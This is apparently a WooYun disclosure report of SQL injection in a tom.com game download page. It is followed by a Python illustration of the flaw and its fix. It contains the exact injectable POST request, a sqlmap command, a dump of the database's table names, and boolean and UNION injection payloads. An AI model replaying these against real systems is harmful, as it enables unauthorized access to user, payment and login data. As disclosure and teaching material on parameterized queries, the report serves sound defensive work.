WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, browse online -------- http://drop.zone.ci/
2015-06-09: Details sent to the vendor; awaiting the vendor's handling.
2015-06-14: The vendor chose to ignore the vulnerability; details disclosed to the public.
Tom itself claims 400,000.
POST /web/download_page.jsp?source=HP_mobilegame_bybsb&from=00403&class=and&q_id=99 HTTP/1.1
Host: pk.tom.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=abc1jamRVmxlb9eZvF82u
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

mobile_game_id=12777
POST injection: save the request above as test.txt and point sqlmap at the body parameter.

sqlmap.py -r test.txt -p mobile_game_id --dbms mysql
Database: newwapdb
[228 tables]
+---------------------------------------+
| back_download_game_info               |
| bind_tom_139                          |
| download_count                        |
| filter_words                          |
| game_bulletin                         |
| game_clientinfo                       |
| game_cogameinfo                       |
| game_coinfo                           |
| game_goods                            |
| game_goods_type                       |
| game_mission                          |
| game_netbattle                        |
| game_netbattle_item                   |
| game_photo                            |
| game_single_record                    |
| game_stat_day                         |
| game_toolsinfo                        |
| game_uids                             |
| game_user                             |
| game_user_black                       |
| game_user_chat                        |
| game_user_friend                      |
| game_user_level                       |
| game_user_sign                        |
| game_user_sns                         |
| game_user_task                        |
| game_user_visitor                     |
| game_useraddressinfo                  |
| game_usergold                         |
| game_usergolddetail                   |
| game_usergoods                        |
| game_userinfo                         |
| game_usermdoupmsg                     |
| game_userpay_offerclient              |
| game_userpayrecord                    |
| game_userprize                        |
| game_userrandom                       |
| game_userrandom_bak                   |
| game_userrandom_new                   |
| game_userrechargerecord               |
| game_v2_netbattle                     |
| game_v2_netbattle_finalgoldinfo       |
| game_v3_bulletin                      |
| game_v3_friends                       |
| game_v3_linkmobile                    |
| game_v3_netbattle                     |
| game_v3_netbattle_finalgoldinfo       |
| game_v3_netbattle_item                |
| game_v3_pksparameter                  |
| game_v3_prizes                        |
| game_v3_sendsmsinfo                   |
| game_v3_single_record                 |
| game_v3_usergold                      |
| game_v3_usergolddetail                |
| game_v3_userinfo                      |
| game_v3_userprize                     |
| game_v4_adv_record                    |
| game_v4_bulletin                      |
| game_v4_bulletin_wap                  |
| game_v4_cmddisc_history               |
| game_v4_coupon_history                |
| game_v4_couponprize_info              |
| game_v4_fgrechargeprize_history       |
| game_v4_finalgold_rechargeinfo        |
| game_v4_friends                       |
| game_v4_gamedown_config               |
| game_v4_gametype_info                 |
| game_v4_linkmobile                    |
| game_v4_lucklydraw_history            |
| game_v4_manualprize                   |
| game_v4_manualprize_info              |
| game_v4_message                       |
| game_v4_message_bak20120420           |
| game_v4_message_bak20120501           |
| game_v4_message_bak20120604           |
| game_v4_message_location              |
| game_v4_message_location_bak20120420  |
| game_v4_message_location_bak20120501  |
| game_v4_message_location_bak20120604  |
| game_v4_message_location_new          |
| game_v4_message_new                   |
| game_v4_mobileuid_linkinfo            |
| game_v4_msgpush_info                  |
| game_v4_msgpush_type                  |
| game_v4_netbattle                     |
| game_v4_netbattle_bak20120420         |
| game_v4_netbattle_finalgoldinfo       |
| game_v4_netbattle_item                |
| game_v4_netbattle_item_bak20120420    |
| game_v4_onlinegame_info               |
| game_v4_onlinegame_itempayment        |
| game_v4_onlinegame_smscode            |
| game_v4_payment_platform_detail       |
| game_v4_pksparameter                  |
| game_v4_prizes                        |
| game_v4_robot_sendsmscount            |
| game_v4_robotinfo                     |
| game_v4_sendsmsinfo                   |
| game_v4_single_record                 |
| game_v4_thirdpart_cardinfo            |
| game_v4_thirdpart_partnerinfo         |
| game_v4_thirdpart_usercard            |
| game_v4_topboard                      |
| game_v4_user_freegold                 |
| game_v4_user_freegold_monthly         |
| game_v4_user_freegolddetail           |
| game_v4_user_prizeinfo                |
| game_v4_userbattle_summarizinfo       |
| game_v4_usercoupon_info               |
| game_v4_usergold                      |
| game_v4_usergolddetail                |
| game_v4_userinfo                      |
| game_v4_userinfo_extend               |
| game_v4_userlogin                     |
[table listing cut off in the original; sqlmap reported 228 tables]
Every table you would expect (user info, gold balances, payment and recharge records, login data) is there.
Filter the input: mobile_game_id is a numeric identifier, so reject anything that is not an integer and pass it to the query as a bound parameter instead of concatenating it into the SQL string.
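The following Python is an added illustration, not code from this report or from tom.com: it models the flaw behind the request above (a POST value pasted into the SQL text of download_page.jsp) and the fix the recommendation calls for. An in-memory sqlite3 database stands in for the MySQL newwapdb instance, the table columns and handler names are constructed for the example, and the boolean probe is the same true/false comparison sqlmap performs when it tests a numeric parameter.

```python
import sqlite3

# Constructed stand-in schema: one table name is borrowed from the sqlmap
# listing above, its columns and rows are invented for this example.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE game_v4_gamedown_config "
        "(mobile_game_id INTEGER, download_url TEXT)"
    )
    conn.executemany(
        "INSERT INTO game_v4_gamedown_config VALUES (?, ?)",
        [(12777, "/games/12777.jar"), (12778, "/games/12778.jar")],
    )
    return conn


DB = build_db()


def download_page_vulnerable(conn: sqlite3.Connection, mobile_game_id: str):
    """Hypothetical model of the flawed handler: the body parameter is
    concatenated into the query, so anything after the number is parsed as SQL."""
    sql = (
        "SELECT download_url FROM game_v4_gamedown_config "
        "WHERE mobile_game_id=" + mobile_game_id
    )
    return [row[0] for row in conn.execute(sql)]


def download_page_fixed(conn: sqlite3.Connection, mobile_game_id: str):
    """Hardened version: enforce the integer type the parameter is supposed to
    have, then bind it; the database never sees attacker-controlled SQL text."""
    if not mobile_game_id.isdigit():
        raise ValueError("mobile_game_id must be a decimal integer")
    sql = "SELECT download_url FROM game_v4_gamedown_config WHERE mobile_game_id=?"
    return [row[0] for row in conn.execute(sql, (int(mobile_game_id),))]


def boolean_probe(handler, conn: sqlite3.Connection, base: str = "12777") -> bool:
    """Boolean-based injection check on a numeric parameter: append a true and a
    false condition; differing responses mean the value is evaluated as SQL.
    Returns True when the handler is injectable."""
    try:
        true_resp = handler(conn, base + " AND 1=1")
        false_resp = handler(conn, base + " AND 1=2")
    except ValueError:
        return False  # input rejected before it reached the database
    return true_resp != false_resp


def dump_table_names_via_union(conn: sqlite3.Connection):
    """UNION-based extraction through the vulnerable handler, the kind of query
    behind a table listing. sqlite_master is the sqlite equivalent of MySQL's
    information_schema.tables, which sqlmap would read on the real target."""
    payload = "-1 UNION SELECT name FROM sqlite_master WHERE type='table'"
    return download_page_vulnerable(conn, payload)


if __name__ == "__main__":
    print("vulnerable handler injectable:", boolean_probe(download_page_vulnerable, DB))
    print("fixed handler injectable:     ", boolean_probe(download_page_fixed, DB))
    print("tables via UNION:             ", dump_table_names_via_union(DB))
```

The probe is the minimal manual check to run before reaching for sqlmap: send the legitimate value with `AND 1=1` and `AND 1=2` appended and compare the two responses. Against the fixed handler the `isdigit` guard rejects both probes outright, and even a value that passed the guard could only ever be bound as an integer.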
Severity: No impact (vendor ignored)
Ignored at: 2015-06-14 10:30
Vulnerability Rank: 15 (WooYun rating)
Vendor response: none